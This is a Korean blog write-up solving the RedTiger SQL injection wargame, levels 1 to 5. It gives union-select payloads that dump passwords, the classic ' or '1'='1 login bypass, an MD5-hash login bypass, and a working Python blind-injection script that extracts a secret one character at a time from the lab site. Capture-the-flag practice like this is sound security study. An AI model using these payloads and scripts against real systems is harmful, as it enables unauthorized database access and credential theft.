728x90
Level 1
id = 1 union select 1,2,password ,4 from level1_users
Level 2
id : 1' or '1'='1
pw : 1' or '1'='1
Level 3
preg_match error 유발 -> source auditing 'urlcrypt.inc'
encrypt 함수 그대로 이용해서 injection 시도
encrypt("' union select 1,2,3,username,password,6,7 from level3_users where username='admin'#")
Level 4
blind 할 때, ascii 안 쓰고 substr()=0x61 이런 식으로 바로 비교할 수 있다.
import urllib2
import time
import string
headers = {"Cookie":"level4login=there_is_no_bug"}
def pwn(payload):
print payload
url = "http://redtiger.labs.overthewire.org/level4.php?id={}".format(urllib2.quote(payload))
req = urllib2.Request(url, headers=headers)
res = urllib2.urlopen(req).read()
if res.find("Query returned 1 rows.") > -1:
return True
else: return False
def getPwLength():
for i in xrange(30):
payload = "if((select length(keyword) from level4_secret limit 0,1)={},1,0)".format(i)
if pwn(payload) == True:
break
print 'pw len : ', i
return i
def getPw():
pw = ''
for i in xrange(1, getPwLength()+1):
for c in string.printable:
payload = "if((select substr(keyword,{},1) from level4_secret limit 0,1)={},1,0)".format(i, hex(ord(c)))
if pwn(payload) == True:
pw += c
print 'pw : ', pw
break
return pw
if __name__=="__main__":
getPw()Level 5
username parameter의 pw 칼럼 위치에 있는 값과, pw 값을 같게 만들어 주면 된다.
pw는 md5 encrypt 되어 있는 값이기 때문에, md5 hash 값을 넣어준다.
import urllib2
import md5
from urllib import urlencode
headers = {"Cookie":"level5login=there_is_a_truck"}
def pwn(password):
params = {
"username":"' union select 1,'{encrypted_pw}'#".format(
encrypted_pw = md5.new(password).hexdigest()
),
"password":"{pw}".format( pw=password )
}
url = "http://redtiger.labs.overthewire.org/level5.php?mode=login"
req = urllib2.Request(url, urlencode(params), headers=headers)
res = urllib2.urlopen(req).read()
return res
if __name__=="__main__":
print pwn("jskim")728x90
댓글